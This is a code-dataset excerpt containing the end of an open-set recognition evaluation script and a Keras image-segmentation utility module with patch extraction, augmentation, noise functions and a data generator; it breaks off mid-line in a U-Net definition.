axes.set_xlim([min_hbr,1.0])\n axes.set_ylim([0.0,0.8])\n plt.plot(hbr, f1)\n plt.show()\n \n return hbr[abridged_hbr_beg:], f1[abridged_hbr_beg:]\n\n\ndef calc_auroc(seen_conf_dict, unseen_conf_dict, key):\n \"\"\" Computes standard AUROC given predictions. \n \n Args:\n seen_conf_dict: [dict] the max probability assigned to any class for each datapoint, across seen inputs\n unseen_conf_dict: [dict] the max probability assigned to any class for eacah datapoint, across novel inputs\n key: [str] whether to retrieve the unnormalized 'dist' value or the normalized 'prob' value\n \"\"\"\n # Interpret scores as probability for open cls\n raw_seenset_openscores = []\n for leaf_name in seen_conf_dict.keys():\n raw_seenset_openscores = raw_seenset_openscores + [record[key] for record in seen_conf_dict[leaf_name]]\n raw_seenset_openscores = np.array(raw_seenset_openscores)\n seenset_openscores = -raw_seenset_openscores\n seenset_true = np.zeros((len(seenset_openscores),))\n raw_unseenset_openscores = []\n for leaf_name in unseen_conf_dict.keys():\n raw_unseenset_openscores = raw_unseenset_openscores + [record[key] for record in unseen_conf_dict[leaf_name]]\n raw_unseenset_openscores = np.array(raw_unseenset_openscores)\n unseenset_openscores = -raw_unseenset_openscores\n unseenset_true = np.ones((len(unseenset_openscores),))\n all_openscores = np.concatenate((seenset_openscores, unseenset_openscores), axis=None)\n all_true = np.concatenate((seenset_true, unseenset_true), axis=None)\n auc_score = roc_auc_score(all_true, all_openscores)\n return auc_score\n\n\ndef collect_rpl_max(model, dataset_type, loader, folder_to_name, gamma, cifar=False, idx_to_label=None):\n \"\"\" Care about 1) identity of max known class 2) distance to reciprocal points of this class. \"\"\"\n with torch.no_grad():\n confidence_dict = defaultdict(list)\n for i, data in enumerate(loader, 0): \n # get the inputs & combine positive and negatives together\n img = data['image']\n img = img.cuda()\n if cifar:\n label_idx = data['label']\n else:\n folder_names = data['folder_name']\n\n outputs = model.forward(img) \n\n logits, dist_to_rp = compute_rpl_logits(model, outputs, gamma)\n max_distances, max_indices = torch.max(logits, 1)\n probs = torch.softmax(logits, dim=1)\n max_probs, max_indices = torch.max(probs, 1)\n \n for j in range(0, img.shape[0]):\n if cifar:\n correct_leaf = idx_to_label[label_idx[j].item()]\n else:\n correct_leaf = folder_to_name['n' + folder_names[j]]\n predicted_leaf_idx = max_indices[j].item()\n dist = max_distances[j].item()\n prob = max_probs[j].item()\n confidence_dict[correct_leaf].append({'idx': predicted_leaf_idx, 'dist': dist, 'prob': prob})\n\n return confidence_dict\n\n\ndef evaluate_val(model, criterion, val_loader, gamma, lamb, divide, logger):\n with torch.no_grad():\n running_loss = 0.0\n normal_correct = 0.\n used_correct = 0.\n normal_total = 0.0\n used_total = 0.0 \n normal_running_loss = 0.\n used_running_loss = 0.\n val_rpl_loss = 0.\n \n logger.info(\"beginning validation\")\n\n for i, data in enumerate(val_loader, 0):\n \n # get the inputs & combine positive and negatives together\n img = data['image']\n img = img.cuda()\n \n labels = data['label']\n labels = labels.cuda()\n\n outputs = model.forward(img)\n \n # Compute RPL loss\n loss, open_loss, closed_loss, logits = compute_rpl_loss(model, outputs, labels, criterion, lamb, gamma, divide == 'TRUE')\n val_rpl_loss += loss.item()\n\n probs = torch.softmax(logits, dim=1)\n max_probs, max_indices = torch.max(probs, 1)\n \n used_correct += torch.sum(max_indices == labels).item()\n used_total += probs.shape[0]\n used_running_loss += loss.item()\n\n used_val_acc = used_correct/(used_total)\n logger.info(\"Used Validation Accuracy is : \" + str(used_val_acc))\n logger.info(\"Used Average validation loss is: \" + str(used_running_loss/used_total))\n logger.info(\"finished validation\")\n \n return used_running_loss, used_val_acc\n \n \ndef seenval_baseline_thresh(confidence_dict, thresh, cifar=False, label_to_idx=None, folder_to_idx=None, name_to_folder=None, save_path=None, value_key='prob'):\n \"\"\" Given a softmax classifier, evaluate performance on seen validation set using thresholds on softmax probabilities. \"\"\"\n softmax_correct = [0.0 for i in range(0, len(thresh))]\n per_cls_softmax_correct = [{leaf_name: 0.0 for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n mistake_log = [{leaf_name: {} for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n semantic_precision = np.zeros((len(thresh), ))\n semantic_tot = np.zeros((len(thresh), ))\n num_correctly_predict_seen = np.zeros((len(thresh), ))\n num_predict_seen = np.zeros((len(thresh), ))\n total = 0.0\n # fix class\n for leaf_name in confidence_dict.keys():\n \n max_indices = torch.tensor([record['idx'] for record in confidence_dict[leaf_name]]).long()\n max_probs = torch.tensor([record[value_key] for record in confidence_dict[leaf_name]])\n \n if cifar:\n labels = torch.full(max_indices.size(), label_to_idx[leaf_name], dtype=torch.long)\n else:\n labels = torch.full(max_indices.size(), folder_to_idx[name_to_folder[leaf_name]], dtype=torch.long)\n \n total += max_indices.shape[0]\n \n for i in range(0, len(thresh)):\n proceed = max_probs.cpu() > torch.full(max_probs.size(), thresh[i])\n num_predict_seen[i] += torch.sum(proceed).item()\n correct_cls = max_indices.cpu() == labels\n correct_vec = correct_cls & proceed\n num_corr = torch.sum(correct_vec).item()\n softmax_correct[i] += num_corr\n per_cls_softmax_correct[i][leaf_name] = num_corr/len(confidence_dict[leaf_name])\n \n total = float(sum([len(confidence_dict[leaf_name]) for leaf_name in confidence_dict.keys()]))\n success_rate = [softmax_correct[i]/total for i in range(0, len(softmax_correct))]\n \n info = {'success_rate': success_rate, 'per_cls_softmax_correct': per_cls_softmax_correct, 'mistake_log': mistake_log, \n 'semantic_precision': semantic_precision, 'num_correctly_predict_seen': softmax_correct, 'num_predict_seen': num_predict_seen, 'total': total}\n \n if save_path is not None:\n \n if os.path.exists(save_path):\n raise ValueError(save_path + ' already exists.')\n \n with open(save_path, 'wb') as f:\n pickle.dump(info, f)\n \n return info\n\n\ndef summarize(seenval_report, unseenval_report, thresh, verbose=True):\n \"\"\" Produce miscellaneous metrics based on predictions. \"\"\"\n seen_precision = []\n hbr = []\n whole_prec = []\n recall = []\n f1 = []\n f1_hbr_avg = []\n mod_f1 = []\n harm_mod_f1 = []\n unique_hbr = []\n unique_f1 = []\n unique_seen_recall = []\n prev_hbr = -100.0\n best_f1 = -10.0\n best_seen_recall = -10.0\n fpr = []\n unique_fpr = []\n fpr_assoc_hbr = []\n prev_fpr = -100.0\n best_fpr_assoc_hbr = -10.0\n for i in range(0, len(thresh)):\n\n curr_seen_prec = seenval_report['num_correctly_predict_seen'][i]/seenval_report['num_predict_seen'][i]\n seen_precision.append(curr_seen_prec)\n \n curr_hbr = (unseenval_report['total'] - unseenval_report['num_predict_seen'][i])/unseenval_report['total']\n hbr.append(curr_hbr)\n \n curr_whole_prec = (curr_seen_prec + curr_hbr)/2.0\n curr_harm_whole_prec = (2.0 * ((curr_seen_prec * curr_hbr)/(curr_seen_prec + curr_hbr)))\n whole_prec.append(curr_whole_prec)\n\n curr_recall = seenval_report['num_correctly_predict_seen'][i]/seenval_report['total']\n recall.append(curr_recall)\n curr_f1 = 2.0 * ((curr_seen_prec * curr_recall)/(curr_seen_prec + curr_recall))\n f1.append(curr_f1)\n \n # if we are on a streak of > 1 of the same value, then update best associated f1 and maintain streak to next hbr\n if curr_hbr == prev_hbr:\n if curr_f1 > best_f1:\n best_f1 = curr_f1\n if curr_recall > best_seen_recall:\n best_seen_recall = curr_recall\n # otherwise streak is broken with prev_hbr, then record prev_hbr/best_associated_f1 and reset trackers for new hbr\n else:\n # edge case where covering first possible hbr, then don't add anything\n if prev_hbr >= 0:\n unique_hbr.append(prev_hbr)\n unique_f1.append(best_f1)\n unique_seen_recall.append(best_seen_recall)\n prev_hbr = curr_hbr\n best_f1 = curr_f1\n best_seen_recall = curr_recall\n \n # edge case: last threshold, must close down. if streak, end with best value. else no streak, put in current value.\n if i == len(thresh) - 1:\n unique_hbr.append(prev_hbr)\n unique_f1.append(best_f1)\n unique_seen_recall.append(best_seen_recall)\n \n f1_hbr_avg.append((curr_f1 + curr_hbr)/2.0)\n mod_f1.append(2.0 * ((curr_whole_prec * curr_recall)/(curr_whole_prec + curr_recall)))\n harm_mod_f1.append(2.0 * ((curr_harm_whole_prec * curr_recall)/(curr_harm_whole_prec + curr_recall)))\n \n # calculate fpr\n curr_fpr = (seenval_report['total'] - seenval_report['num_predict_seen'][i])/seenval_report['total']\n fpr.append(curr_fpr)\n \n if curr_fpr == prev_fpr:\n if curr_hbr > best_fpr_assoc_hbr:\n best_fpr_assoc_hbr = curr_hbr\n else:\n if prev_fpr >= 0:\n unique_fpr.append(prev_fpr)\n fpr_assoc_hbr.append(best_fpr_assoc_hbr)\n prev_fpr = curr_fpr\n best_fpr_assoc_hbr = curr_hbr\n \n if i == len(thresh) - 1:\n unique_fpr.append(prev_fpr)\n fpr_assoc_hbr.append(best_fpr_assoc_hbr)\n \n \n # clean nan values so auc calc works\n clean_unique_hbr = []\n clean_unique_f1 = []\n for i in range(0, len(unique_hbr)):\n if not np.isnan(unique_f1[i]):\n clean_unique_hbr.append(unique_hbr[i])\n clean_unique_f1.append(unique_f1[i])\n \n hbr_recall_auc = sklearn.metrics.auc(unique_hbr, unique_seen_recall)\n \n lit_auc = sklearn.metrics.auc(unique_fpr, fpr_assoc_hbr)\n \n if verbose:\n print(\"AUC of Open-Recall vs. Closed-Recall curve: \" + str(hbr_recall_auc))\n print(\"AUROC from literature: \" + str(lit_auc))\n print(\"U-OSR/U-CSR: \")\n for i in range(0, len(unique_hbr)):\n print(str(unique_hbr[i]) + '/' + str(unique_seen_recall[i]))\n \n# print(\"\\nFull Details --- SeenP/R/ModF1/ModHarmF1/FPR/HBR/F1/F1_HBR_AVG: \")\n# for i in range(0, len(thresh)):\n# print(\"At thresh \" + str(thresh[i]) + ': ' + str(round(seen_precision[i], 3)) + '/' + str(round(recall[i], 3)) + '/' + str(round(mod_f1[i], 3)) + '/' + str(round(harm_mod_f1[i], 3)) + '/' + str(round(fpr[i], 3)) + '/' + str(round(hbr[i], 3)) + '/' + str(round(f1[i], 3)) + '/' + str(round(f1_hbr_avg[i], 3)))\n\n return {'lit_AUROC': lit_auc, 'OSR_CSR_AUC': hbr_recall_auc, 'cleaned_open_recall': clean_unique_hbr, 'cleaned_f1': clean_unique_f1, 'unique_open_recall': unique_hbr, 'unique_closed_recall': unique_seen_recall, 'unique_fpr': unique_fpr, 'fpr_assoc_hbr': fpr_assoc_hbr}\n\n\ndef unseenval_baseline_thresh(confidence_dict, thresh, save_path=None, value_key='prob'):\n \"\"\" Given a softmax classifier, evaluate performance on unseen validation set using thresholds on softmax probabilities. \"\"\"\n softmax_correct = [0.0 for i in range(0, len(thresh))]\n per_cls_softmax_correct = [{leaf_name: 0.0 for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n mistake_log = [{leaf_name: {} for leaf_name in confidence_dict.keys()} for i in range(0, len(thresh))]\n semantic_precision = np.zeros((len(thresh), ))\n num_predict_seen = np.zeros((len(thresh), ))\n # fix class\n for leaf_name in confidence_dict.keys():\n \n max_indices = torch.tensor([record['idx'] for record in confidence_dict[leaf_name]]).long()\n max_probs = torch.tensor([record[value_key] for record in confidence_dict[leaf_name]])\n \n for i in range(0, len(thresh)):\n proceed = max_probs.cpu() > torch.full(max_probs.size(), thresh[i])\n num_predict_seen[i] += torch.sum(proceed).item()\n correct_vec = ~proceed\n num_corr = torch.sum(correct_vec).item()\n softmax_correct[i] += num_corr\n per_cls_softmax_correct[i][leaf_name] = num_corr/len(confidence_dict[leaf_name])\n \n total = float(sum([len(confidence_dict[leaf_name]) for leaf_name in confidence_dict.keys()]))\n success_rate = [softmax_correct[i]/total for i in range(0, len(softmax_correct))]\n \n info = {'success_rate': success_rate, 'per_cls_softmax_correct': per_cls_softmax_correct, 'mistake_log': mistake_log, \n 'semantic_precision': semantic_precision, 'num_predict_seen': num_predict_seen, 'total': total}\n \n if save_path is not None:\n \n if os.path.exists(save_path):\n raise ValueError(save_path + ' already exists.')\n \n with open(save_path, 'wb') as f:\n pickle.dump(info, f)\n \n return info\n","repo_name":"KevLuo/OpenSet_ReciprocalPoints","sub_path":"rpl/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":14543,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"30762284989","text":"import numpy as np\r\nimport os, sys, fnmatch\r\nfrom skimage import io\r\nfrom skimage.transform import rotate\r\nfrom skimage.util.shape import view_as_windows\r\nfrom keras.models import Model\r\nfrom keras.losses import binary_crossentropy, categorical_crossentropy\r\nfrom keras.layers import Convolution2D, MaxPooling2D, Lambda, Reshape, Flatten, merge\r\nfrom keras.layers import Input, Concatenate, UpSampling2D, Dropout, BatchNormalization\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras import backend as K\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils import to_categorical, Sequence\r\n\r\n##################\r\n# Path functions #\r\n##################\r\n\r\n# Collect paths of images recursively\r\ndef get_paths(path, img_extension, subfolder=None):\r\n if subfolder:\r\n path = os.path.join(path, subfolder)\r\n \r\n img_paths = []\r\n for root, directories, filenames in os.walk(path):\r\n for filename in fnmatch.filter(filenames, \"*\" + img_extension):\r\n img_paths.append(os.path.join(root,filename))\r\n \r\n return img_paths\r\n\r\n# Collects image and mask paths for training\r\ndef training_paths(path, img_extension, mask_extension):\r\n img_paths = get_paths(path, img_extension, subfolder='images')\r\n mask_paths = get_paths(path, mask_extension, subfolder='masks')\r\n img_paths.sort()\r\n mask_paths.sort()\r\n return img_paths, mask_paths\r\n\r\n# Loads images and makes training patches\r\ndef get_patches(train_data_path, segmentation_channels, patch_shape, img_extension, mask_extension, workflow_type, patch_thresh=0.05):\r\n # Gather paths\r\n img_paths, mask_paths = training_paths(train_data_path, img_extension, mask_extension)\r\n if len(img_paths) != len(mask_paths):\r\n sys.exit(\"Number of images and masks is inconsistent. Maybe your directories are not named 'images' and 'masks'? Exiting... (# images: {} | # masks: {})\".format(len(img_paths), len(mask_paths)))\r\n \r\n train_images = []\r\n train_masks = []\r\n n_images = len(img_paths)\r\n for ind in range(n_images):\r\n #if (ind+1) % 2 == 0 or ind == 0:\r\n print (\" >> Generating patches for image\", ind+1, \"of\", str(n_images) + \"...\")\r\n print (\" >> Currently at\", len(train_images), \"total image pairs\")\r\n \r\n return np.array(train_images, dtype=np.float32), np.array(train_masks, dtype=np.float32)\r\n \r\n###################\r\n# Image Functions #\r\n###################\r\n\r\ndef change_dim_order(image, dim_order, dim_default):\r\n print (\" >> Converting dimension order from \" + dim_order + '->' + dim_default)\r\n if len(image.shape) < len(dim_order):\r\n print (\" >> The script requires a C dimension of 1... adding C @ dimension \" + str(dim_order.index('C')))\r\n image = np.expand_dims(image, dim_order.index('C'))\r\n image = np.einsum(dim_order + '->' + dim_default, image)\r\n return image\r\n\r\ndef open_image(image_path, dtype=np.float32, channel_dim=True):\r\n img = io.imread(img_path).astype(dtype)\r\n if channel_dim and len(img.shape) < 3:\r\n img = np.expand_dims(img, axis=-1)\r\n return img\r\n\r\ndef channel_selector(img, selected_channels):\r\n n_ch = len(selected_channels)\r\n new_img = np.zeros((img.shape[:-1] + (n_ch,)), dtype=np.float32)\r\n try:\r\n for ch_i in range(n_ch):\r\n new_img[...,ch_i] = img[...,selected_channels[ch_i]]\r\n except IndexError:\r\n sys.exit(\"Error: Too many channels ({}) selected for an image with {} channels! Exiting...\".format(str(selected_channels), img.shape[-1]))\r\n return new_img\r\n \r\ndef max_norm(img):\r\n img = new_img\r\n return img / np.max(img)\r\n \r\n# def convert_if_categorical(label, workflow_type):\r\n # if (len(label.shape) == 2 or (label.shape[-1] == 1 and np.max(label) > 1)) and workflow_type=='segmentation':\r\n # print (\" >> Label looks like grayscale values... converting to categorical representation.\")\r\n # label = to_categorical(label)\r\n # print (\" >> Number of classes in this label: {}\".format(label.shape[-1]))\r\n # else:\r\n # label = max_norm(label)\r\n # if len(label.shape) < 3:\r\n # label = np.expand_dims(label, axis=-1)\r\n \r\n # return label\r\n \r\ndef is_above_thresh(img, threshold):\r\n # Check if this image has enough positive pixels\r\n return (img > 0).sum() > (threshold * np.array(img.shape).prod())\r\n \r\n# Individual augmentations\r\n \r\ndef rotate(img, deg=None):\r\n if deg and deg % 90 == 0:\r\n its = int(deg/90)\r\n for i in range(its):\r\n img = np.rot90(img)\r\n return img\r\n else:\r\n return img\r\n\r\ndef mirror(img, order=None):\r\n if order == 'lr':\r\n return np.fliplr(img)\r\n elif order == 'ud':\r\n return np.flipud(img)\r\n else:\r\n return img\r\n\r\n# Pairwise Augmentations\r\n \r\ndef rotate_pair(img, label, deg=None):\r\n return rotate(img, deg), rotate(label, deg)\r\n\r\ndef mirror_pair(img, label, order=None):\r\n return mirror(img, order), mirror(label, order)\r\nflip_pair = mirror_pair\r\n\r\ndef random_crop(img, label, random_crop_size, threshold=None):\r\n height, width = img.shape[0], img.shape[1]\r\n dy, dx = random_crop_size\r\n x = np.random.randint(0, width - dx + 1)\r\n y = np.random.randint(0, height - dy + 1)\r\n if threshold:\r\n for _ in range(10):\r\n if is_above_thresh(label[y:(y+dy), x:(x+dx)], threshold):\r\n return img[y:(y+dy), x:(x+dx)], label[y:(y+dy), x:(x+dx)]\r\n else:\r\n x = np.random.randint(0, width - dx + 1)\r\n y = np.random.randint(0, height - dy + 1)\r\n return img[y:(y+dy), x:(x+dx)], label[y:(y+dy), x:(x+dx)]\r\n\r\n# Apply random augmentations to image pair\r\n\r\ndef augment_image_pair(img, label, augmentations=None):\r\n if not augmentations:\r\n return img, label\r\n else:\r\n aug_fn = np.random.choice(augmentations, 1)[0]\r\n aug_imgs = [aug_fn(img) for img in imgs]\r\n return aug_imgs \r\n\r\n# Noise Functions\r\n\r\ndef guassian_noise(image, mean=0, var=0.1):\r\n row,col,ch= image.shape\r\n sigma = var**0.5\r\n gauss = np.random.normal(mean,sigma,(row,col,ch))\r\n gauss = gauss.reshape(row,col,ch)\r\n noisy = image + gauss\r\n return noisy\r\n\r\ndef saltpepper_noise(image, svp=0.5, amount=0.004):\r\n row,col,ch = image.shape\r\n out = np.copy(image)\r\n # Salt mode\r\n try:\r\n num_salt = np.ceil(amount * image.size * svp)\r\n coords = [np.random.randint(0, i, int(num_salt)) for i in image.shape]\r\n out[coords] = 1\r\n\r\n # Pepper mode\r\n num_pepper = np.ceil(amount* image.size * (1. - svp))\r\n coords = [np.random.randint(0, i, int(num_pepper)) for i in image.shape]\r\n out[coords] = 0\r\n except:\r\n pass\r\n \r\n return out\r\n\r\ndef poisson_noise(image):\r\n vals = len(np.unique(image))\r\n vals = 2 ** np.ceil(np.log2(vals))\r\n noisy = np.random.poisson(image * vals) / float(vals)\r\n return noisy\r\n \r\ndef speckle_noise(image):\r\n row,col,ch = image.shape\r\n gauss = np.random.randn(row,col,ch)\r\n gauss = gauss.reshape(row,col,ch) \r\n noisy = image + image * gauss\r\n return noisy\r\n\r\n##################\r\n# Data Generator #\r\n##################\r\n\r\nclass PatchDataGen(Sequence):\r\n 'Generates data for Keras'\r\n def __init__(self, data_list, label_list, patch_shape, batch_size, \r\n segmentation_channels, workflow_type, shuffle=True, preloaded_imgs=None, preloaded_labels=None):\r\n self.data_list = data_list\r\n self.label_list = label_list\r\n self.batch_size = batch_size\r\n self.shuffle = shuffle\r\n \r\n # If Preloaded Data exists...\r\n self.preloaded_imgs = preloaded_imgs\r\n self.preloaded_labels = preloaded_labels\r\n \r\n self.patch_shape = patch_shape\r\n self.segmentation_channels = segmentation_channels\r\n self.workflow_type = workflow_type\r\n \r\n self.on_epoch_end()\r\n \r\n def __len__(self):\r\n return int(np.floor(len(self.data_list) / self.batch_size) )\r\n\r\n def __getitem__(self, index):\r\n 'Generate one batch of data'\r\n # Generate indexes of the batch\r\n indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\r\n\r\n # Generate data\r\n return self._data_generation(indexes)\r\n\r\n def on_epoch_end(self):\r\n 'Updates indexes after each epoch'\r\n self.indexes = np.arange(len(self.data_list))\r\n if self.shuffle == True:\r\n np.random.shuffle(self.indexes)\r\n\r\n def _data_generation(self, temp_ids):\r\n 'Generates data containing batch_size samples' # X : (n_samples, *dim, n_channels)\r\n patch_shape = self.patch_shape\r\n segmentation_channels = self.segmentation_channels\r\n \r\n imgs = []\r\n labels = []\r\n # Generate data\r\n for i, id in enumerate(temp_ids):\r\n # Get sample\r\n tmp_img_data = self.data_list[id]\r\n tmp_label_data = self.label_list[id]\r\n \r\n # Ex: [img_paths[ind], patch_ind_0, patch_ind_1, 'fliplr']\r\n tmp_img_path, tmp_patch_ind_0, tmp_patch_ind_1, tmp_augmentation = tmp_img_data\r\n \r\n tmp_mask_path = tmp_label_data[0]\r\n \r\n # Read image, split only the segmentation_channels, and normalize\r\n if self.preloaded_imgs is not None:\r\n img = self.preloaded_imgs[tmp_img_path]\r\n else:\r\n img = io.imread(tmp_img_path).astype(np.float32)\r\n if len(img.shape) < 3:\r\n img = np.expand_dims(img, axis=-1)\r\n n_ch = len(segmentation_channels)\r\n new_img = np.zeros((img.shape[:-1] + (n_ch,))) #, dtype=np.float32)\r\n for ch_i in range(n_ch):\r\n new_img[...,ch_i] = img[...,segmentation_channels[ch_i]]\r\n img = new_img\r\n img = img / np.max(img)\r\n \r\n img_patch_shape = patch_shape + (img.shape[-1],)\r\n \r\n # Load masks and normalize\r\n if self.preloaded_labels is not None:\r\n mask = self.preloaded_labels[tmp_mask_path]\r\n else:\r\n mask = io.imread(tmp_mask_path).astype(np.float32)\r\n if (len(mask.shape) == 3) and (mask.shape[0] < mask.shape[-1]):\r\n mask = np.moveaxis(mask, 0, -1)\r\n \r\n # If mask is a single channel with grayscale values as labels, convert to channel format\r\n if (len(mask.shape) == 2 or (mask.shape[-1] == 1 and np.max(mask) > 1)) and self.workflow_type=='segmentation':\r\n mask = to_categorical(mask)\r\n else:\r\n mask = mask / np.max(mask)\r\n if len(mask.shape) < 3:\r\n mask = np.expand_dims(mask, axis=-1)\r\n mask_patch_shape = patch_shape + (mask.shape[-1],)\r\n \r\n # Create windows from both the training images and the masks\r\n img_patches = view_as_windows(img, img_patch_shape, step=patch_shape[0]//4)\r\n mask_patches = view_as_windows(mask, mask_patch_shape, step=patch_shape[0]//4)\r\n img_patches = np.squeeze(img_patches)\r\n mask_patches = np.squeeze(mask_patches)\r\n \r\n # Select the correct patch\r\n img_patch = np.array(img_patches[tmp_patch_ind_0,tmp_patch_ind_1])\r\n mask_patch = np.array(mask_patches[tmp_patch_ind_0,tmp_patch_ind_1])\r\n\r\n # Add Channel dim if not included\r\n if len(img_patch.shape) < 3:\r\n img_patch = np.expand_dims(img_patch, axis=-1)\r\n if len(mask_patch.shape) < 3:\r\n mask_patch = np.expand_dims(mask_patch, axis=-1)\r\n\r\n # Do augmentation if needed\r\n if tmp_augmentation != '':\r\n \r\n # Geometric Augmentations\r\n if tmp_augmentation[:3] == 'rot':\r\n img_patch, mask_patch = rotate_pair(img_patch, mask_patch, deg=int(tmp_augmentation[3:]))\r\n elif tmp_augmentation[:4] == 'flip':\r\n img_patch, mask_patch = flip_pair(img_patch, mask_patch, order=tmp_augmentation[4:])\r\n \r\n # Noise Augmentations\r\n elif 'noise' in tmp_augmentation:\r\n if 'gaussian' in tmp_augmentation:\r\n img_patch = guassian_noise(img_patch)\r\n elif 'speckle' in tmp_augmentation:\r\n img_patch = speckle_noise(img_patch)\r\n elif 'poisson' in tmp_augmentation:\r\n img_patch = poisson_noise(img_patch)\r\n elif 'saltpepper' in tmp_augmentation:\r\n img_patch = saltpepper_noise(img_patch)\r\n \r\n # TODO: Add Color Augmentations\r\n\r\n imgs.append(img_patch)\r\n labels.append(mask_patch)\r\n \r\n return np.array(imgs), np.array(labels)\r\n \r\n#################################\r\n# Calculate Valid Image Patches #\r\n#################################\r\n\r\n# Loads images and makes training patches\r\ndef calculate_valid_patches_and_stats(train_data_path, segmentation_channels, patch_shape, img_extension, mask_extension, workflow_type, validation_split=0.2, patch_thresh=0.05, augmentations=[]):\r\n # Gather paths\r\n img_paths, mask_paths = training_paths(train_data_path, img_extension, mask_extension)\r\n if len(img_paths) != len(mask_paths):\r\n sys.exit(\"Number of images and masks is inconsistent. Exiting... (# images: %d | # masks: %d)\".format(len(img_paths), len(mask_paths)))\r\n \r\n print (\" >> Training augmentations to perform: \", augmentations)\r\n categorical_notice = True\r\n input_channels = None\r\n output_channels = None\r\n train_images = []\r\n train_masks = []\r\n val_images = []\r\n val_masks = []\r\n n_images = len(img_paths)\r\n \r\n # Image Data Dictionaries\r\n loaded_imgs = {}\r\n loaded_masks = {}\r\n \r\n # Calculate Validation Images\r\n n_val_images = int(np.ceil(n_images * validation_split))\r\n val_inds = list(np.random.choice(n_images, n_val_images, replace=False))\r\n \r\n for ind in range(n_images):\r\n if ind not in val_inds:\r\n training_flag = True\r\n else:\r\n training_flag = False\r\n \r\n if (ind+1) % 10 == 0 or ind == 0 or not training_flag:\r\n print (\" >> Calculating valid **\", \"TRAINING\" if training_flag else \"VALIDATION\", \"** patches for image\", ind+1, \"of\", str(n_images) + \"...\")\r\n print (\" >> Currently at\", len(train_images) if training_flag else len(val_images), \"image pairs\")\r\n \r\n # Read image, split only the segmentation_channels, and normalize\r\n img = io.imread(img_paths[ind]).astype(np.float32)\r\n if len(img.shape) < 3:\r\n img = np.expand_dims(img, axis=-1)\r\n n_ch = len(segmentation_channels)\r\n new_img = np.zeros((img.shape[:-1] + (n_ch,)), dtype=np.float32)\r\n for ch_i in range(n_ch):\r\n new_img[...,ch_i] = img[...,segmentation_channels[ch_i]]\r\n img = new_img\r\n img = img / np.max(img)\r\n img = (img - np.mean(img)) / np.std(img)\r\n img_patch_shape = patch_shape + (img.shape[-1],)\r\n \r\n # Load masks and normalize\r\n mask = io.imread(mask_paths[ind]).astype(np.float32)\r\n if (len(mask.shape) == 3) and (mask.shape[0] < mask.shape[-1]):\r\n print (\" >> Mask looks like channels-first representation (Shape: {})... converting to channels-last representation (Shape: {}).\".format(mask.shape, np.moveaxis(mask, 0, -1).shape))\r\n mask = np.moveaxis(mask, 0, -1)\r\n \r\n # If mask is a single channel with grayscale values as labels, convert to channel format\r\n if (len(mask.shape) == 2 or (mask.shape[-1] == 1 and np.max(mask) > 1)) and workflow_type=='segmentation':\r\n mask = to_categorical(mask)\r\n if categorical_notice:\r\n print (\" >> Number of classes in this mask: {}\".format(mask.shape[-1]))\r\n print (\" >> Mask looks like grayscale values... converting to categorical representation.\")\r\n categorical_notice = False\r\n else:\r\n mask = mask / np.max(mask)\r\n if len(mask.shape) < 3:\r\n mask = np.expand_dims(mask, axis=-1)\r\n mask_patch_shape = patch_shape + (mask.shape[-1],)\r\n \r\n # Append the images to a dictionary\r\n loaded_imgs[img_paths[ind]] = img\r\n loaded_masks[mask_paths[ind]] = mask\r\n \r\n # Create windows from both the training images and the masks\r\n img_patches = view_as_windows(img, img_patch_shape, step=patch_shape[0]//4)\r\n mask_patches = view_as_windows(mask, mask_patch_shape, step=patch_shape[0]//4)\r\n img_patches = np.squeeze(img_patches)\r\n mask_patches = np.squeeze(mask_patches)\r\n \r\n # Calculate input and output channels\r\n if input_channels is None:\r\n if n_ch >= 1:\r\n input_channels = n_ch\r\n else:\r\n input_channels = 1\r\n if output_channels is None:\r\n output_channels = mask_patch_shape[-1]\r\n \r\n # Set the threshold number of pixels required to add the training image to the set\r\n # If at least 5% of the mask patch has true values \r\n mask_thresh = patch_thresh * patch_shape[0] * patch_shape[1] if patch_thresh < 1 else patch_thresh\r\n \r\n # Iterate over the grid of window views\r\n for patch_ind_0 in range(img_patches.shape[0]):\r\n for patch_ind_1 in range(img_patches.shape[1]):\r\n img_patch = np.array(img_patches[patch_ind_0,patch_ind_1])\r\n mask_patch = np.array(mask_patches[patch_ind_0,patch_ind_1])\r\n \r\n #print([(mask_patch[...,i] > 0).sum() > mask_thresh for i in range(mask_patch.shape[-1]) ] ) \r\n #print (mask_thresh)\r\n \r\n # Only include training images where the mask patch is above the threshold\r\n if all( [(mask_patch[...,i] > 0).sum() > mask_thresh for i in range(mask_patch.shape[-1])] ) or workflow_type=='image2image':\r\n \r\n tmp_img_list = [img_paths[ind], patch_ind_0, patch_ind_1, '']\r\n tmp_masks_list = [mask_paths[ind], patch_ind_0, patch_ind_1, '']\r\n \r\n if training_flag:\r\n # Append Images w/patch coords and augmentations (only if training) cues to list\r\n train_images.append(tmp_img_list)\r\n train_masks.append(tmp_masks_list)\r\n \r\n for augment in augmentations:\r\n tmp_img_list = [img_paths[ind], patch_ind_0, patch_ind_1, augment]\r\n tmp_masks_list = [mask_paths[ind], patch_ind_0, patch_ind_1, augment]\r\n train_images.append(tmp_img_list)\r\n train_masks.append(tmp_masks_list)\r\n \r\n else:\r\n # If validation set, append those images to the correct lists\r\n val_images.append(tmp_img_list)\r\n val_masks.append(tmp_masks_list)\r\n \r\n return train_images, train_masks, val_images, val_masks, input_channels, output_channels, loaded_imgs, loaded_masks\r\n\r\n\r\n##########\r\n# Models #\r\n##########\r\n\r\ndef unet(patch_height, patch_width, in_ch, out_ch, final_act='sigmoid', loss_fn=None):\r\n inputs = Input((patch_height, patch_width, in_ch))\r\n conv1 = Convolution2D(32, (3, 3), activation='relu', padding='same')(inputs)\r\n conv1 = BatchNormalization()(conv1)\r\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\r\n conv2 = Convolution2D(64, (3, 3), activation='relu', padding='same')(pool1)\r\n conv2 = BatchNormalization()(conv2)\r\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\r\n conv3 = Convolution2D(128, (3, 3), activation='relu', padding='same')(pool2)\r\n conv3 = BatchNormalization()(conv3)\r\n\r\n up1 = Concatenate(axis=-1)([UpSampling2D(size=(2, 2))(conv3), 